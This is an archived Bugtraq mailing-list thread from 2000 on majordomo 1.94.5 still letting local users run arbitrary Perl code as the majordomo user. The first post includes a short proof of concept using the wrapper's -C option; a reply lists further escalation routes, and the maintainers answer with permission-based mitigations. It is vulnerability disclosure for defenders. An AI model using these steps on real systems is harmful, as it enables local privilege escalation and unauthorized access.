4724116 2000-01-25 05:32 /39 rader/ Postmaster
Mottagare: Bugtraq (import) <9493>
Ärende: majordomo 1.94.5 does not fix all vulnerabilities
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.10.10001241428460.4903-100000@koala.towery.com>
Date: Mon, 24 Jan 2000 14:55:42 -0600
Reply-To: Brock Sides <bsides@TOWERY.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Brock Sides <bsides@TOWERY.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Whereas majordomo 1.94.5 does fix the bug in resend, discovered by
Brock Tellier, that permits execution of arbitrary code as user
majordomo, it apparently does not fix the other bug in the script
majordomo, that permits execution of arbitrary config files as user
majordomo:
On a fresh install of majordomo 1.94.5 in /tmp:
[brock@o2 /tmp]$ id
uid=1116(brock) gid=1116(brock)
[brock@o2 /tmp]$ ls -l ./id.pl
-rwxr-xr-x 1 brock brock 31 Jan 24 14:17 ./id.pl
[brock@o2 /tmp]$ cat id.pl
#!/usr/bin/perl
system("id");
[brock@o2 /tmp]$ ./majordomo-1.94.5/wrapper majordomo -C ./id.pl
uid=1126(majordomo) gid=1(daemon)
./id.pl did not return a true value at /tmp/majordomo-1.94.5/majordomo
line 47.
[brock@o2 /tmp]$
--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides@towery.com
(4724116) ------------------------------------------(Ombruten)
4727836 2000-01-25 21:03 /62 rader/ Postmaster
Mottagare: Bugtraq (import) <9499>
Ärende: Re: majordomo 1.94.5 does not fix all vulnerabilities
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <20000125155609.D15450@monad.swb.de>
Date: Tue, 25 Jan 2000 15:56:09 +0100
Reply-To: Olaf Kirch <okir@CALDERA.DE>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Olaf Kirch <okir@CALDERA.DE>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.10.10001241428460.4903-100000@koala.towery.com>; fro
bsides@TOWERY.COM on Mon, Jan 24, 2000 at 02:55:42PM -0600
On Mon, Jan 24, 2000 at 02:55:42PM -0600, Brock Sides wrote:
> Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock
> Tellier, that permits execution of arbitrary code as user majordomo, it
> apparently does not fix the other bug in the script majordomo, that
> permits execution of arbitrary config files as user majordomo:
There are a number of ways to get majordomo to execute your perl code.
I mailed the developers a list of things I consider insecure
(like being able to give it a list name of ../../../../tmp/foo, and
it'll create /tmp/foo as majordomo). Other cool things include
wrapper config-test <your perl script file here>
You see, the recommended installation doesn't even distinguish
between debugging and production code -- anybody can run anything
in the majordomo directory with majordomo privs.
Another candidate is archive2.pl which has loads of funny options.
At least let's you write arbitrary files as user majordomo. Your
/usr/lib/majordomo directory owned by majordomo? Great--trojan the
wrapper binary and gain group daemon privilege from sendmail.
Their response to this has been that you should install wrapper
without world execute bit. On a sendmail system this means you
need to make it owned by group daemon so that sendmail can run it
(provided you run it from /etc/aliases):
chmod root.daemon wrapper
chmod 4550 wrapper
If you think about it, this makes daemon and majordomo accounts
interchangeable. If I break daemon, I can become majordomo because of
all the holes in it. If I can become majordomo, I can also become
daemon--I just have to replace the wrapper program with my own binary
(the majordomo directory is owned by majordomo in the default
install).
I consider this broken, but I haven't been able to get more out of
them. That and the license that basically keeps us from shipping a
modified majordomo makes me seriously think about whether we shouldn't
just drop it altogether.
Olaf
--
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
okir@caldera.de +-------------------- Why Not?! -----------------------
UNIX, n.: Spanish manufacturer of fire extinguishers.
(4727836) ------------------------------------------(Ombruten)
4727935 2000-01-25 21:43 /63 rader/ Postmaster
Mottagare: Bugtraq (import) <9502>
Ärende: Re: majordomo 1.94.5 does not fix all vulnerabilities
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Dispatcher: imput version 991025(IM133)
Message-ID: <20000125122028C.cwilson@unknown-domain>
Date: Tue, 25 Jan 2000 12:20:28 +0100
Reply-To: Chan Wilson <cwilson@NEU.SGI.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Chan Wilson <cwilson@NEU.SGI.COM>
X-To: bsides@towery.com
X-cc: BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.10.10001241428460.4903-100000@koala.towery.com>
Brock Sides <bsides@TOWERY.COM> spaketh thusly on Mon, 24 Jan 2000
14:55:42 -0600
about majordomo 1.94.5 does not fix all vulnerabilities...
> Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock
> Tellier, that permits execution of arbitrary code as user majordomo, it
> apparently does not fix the other bug in the script majordomo, that
> permits execution of arbitrary config files as user majordomo:
Correct. That is far better addressed at a o/s level by protecting
the directory that the majordomo code lives in. A security note has
been added to the top of the INSTALL document that attempts to
highlight this matter:
** SECURITY ALERT **
The default installation of Majordomo, including the checks that
config-test does, WILL NOT RESULT IN A SECURE INSTALLATION. In
particular, the majordomo home directory and the "wrapper" program
are, by default, accessible to any user. These open privileges can be
(mis)used to change list membership, list configuration details, forge
email, perhaps even create and/or delete lists, and anything else that
the majordomo user has permissions to do.
If Majordomo is *NOT* installed on a secured system with controlled
access (and if you are paranoid, even if it is), you will need to take
additional steps to prevent access to the majordomo directories.
Usually, changing the privileges of the majordomo home directory to be
0750 fixes these problems, but creates the additional burden of
needing to configure the MTA (sendmail, qmail, exim) properly so that
it can read and execute "wrapper". Such configuration is beyond the
scope of this install document, and is left to the FAQ (Doc/FAQ,
Doc/majordomo-faq.html) and the support group
majordomo-users@greatcircle.com to answer.
** SECURITY ALERT **
While it is possible, as has been posted earlier, to patch all the
code that uses the -C configuration file flag, *and* patch resend to
only allow execution of code in specific directories, *and* rework
code so it knows where to find the relocated code, it is far easier to
simply prevent access to the majordomo directory (including access
log, list configuration, membership, etc) which gives security from
both execution of arbitrary code *and* information security for the
distribution lists.
--Chan
majordomo maintainer.
(4727935) ------------------------------------------(Ombruten)
4727964 2000-01-25 21:57 /35 rader/ Postmaster
Mottagare: Bugtraq (import) <9504>
Ärende: Re: majordomo 1.94.5 does not fix all vulnerabilities
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <388DB92F.F5D0D137@visi.com>
Date: Tue, 25 Jan 2000 08:54:39 -0600
Reply-To: Dave Barr <barr@VISI.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Dave Barr <barr@VISI.COM>
X-To: BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Brock Sides wrote:
> Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock
> Tellier, that permits execution of arbitrary code as user majordomo, it
> apparently does not fix the other bug in the script majordomo, that
> permits execution of arbitrary config files as user majordomo:
While people need to certainly be made clear of this, this is entirely
intentional.
The cleanest fix to the problem of the majordomo programs running
arbitrary code as the majordomo user/group is to fix the permissions
of the wrapper so it is mode o-rx. (or that the Majordomo home
directory is mode mode 750) Any other proposed solutions were
fraught with race conditions, partial fixes, and just plain
uglinesses.
This is clearly explained in the INSTALL document in 1.94.5 and
re-emphasized on the Majordomo FAQ.
--Dave
Majordomo FAQ maintainer
(4727964) ------------------------------------------(Ombruten)